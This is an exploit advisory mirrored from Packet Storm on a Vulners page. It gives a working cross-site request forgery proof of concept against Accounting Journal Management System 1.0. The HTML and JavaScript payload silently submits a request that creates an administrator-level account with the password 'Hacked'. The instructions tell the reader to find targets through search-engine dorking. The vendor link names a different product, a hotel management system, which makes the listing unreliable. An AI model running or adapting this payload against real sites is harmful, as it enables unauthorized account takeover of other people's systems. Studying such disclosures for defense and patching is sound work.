Lucene search
K

Accounting Journal Management System 1.0 Cross Site Request Forgery

🗓️ 19 Aug 2024 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 172 Views

Accounting Journal Management System 1.0 CSRF Vulnerability exploi

Code
`=============================================================================================================================================  
| # Title : Accounting Journal Management System 1.0 CSRF Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |  
| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/hotel-management-system-using-php.zip |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] Line 6 : Set your target url  
  
[+] Line 15 + 19 : Set user & pass  
  
[+] save payload as poc.html   
  
[+] payload :   
  
<!DOCTYPE html>   
<html>   
<body>  
<script> function submitRequest()   
{ var xhr = new XMLHttpRequest();   
xhr.open("POST", "http://127.0.0.1/ajms/classes/Users.php?f=save", true);  
xhr.setRequestHeader("Accept", "*\/*");   
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");  
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------");  
xhr.withCredentials = true;   
var body =  
"-----------------------------\r\n" +   
"Content-Disposition: form-data; name=\"username\"\r\n" +   
"\r\n" +   
"indoushka\r\n" +   
"-----------------------------\r\n" +   
"Content-Disposition: form-data; name=\"password\"\r\n" +   
"\r\n" +   
"Hacked\r\n" +   
"-----------------------------\r\n" +   
"Content-Disposition: form-data; name=\"type\"\r\n" +   
"\r\n" +   
"1\r\n" +   
"-------------------------------\r\n";   
var aBody = new Uint8Array(body.length);   
for (var i = 0; i < aBody.length; i++)   
aBody[i] = body.charCodeAt(i);   
xhr.send(new Blob([aBody]));   
}  
</script>  
<form action="#">  
<input type="button" value="Submit request" onclick="submitRequest();" />  
</form>   
</body>   
</html>  
  
  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 Aug 2024 00:00Current
7.4High risk
Vulners AI Score7.4
172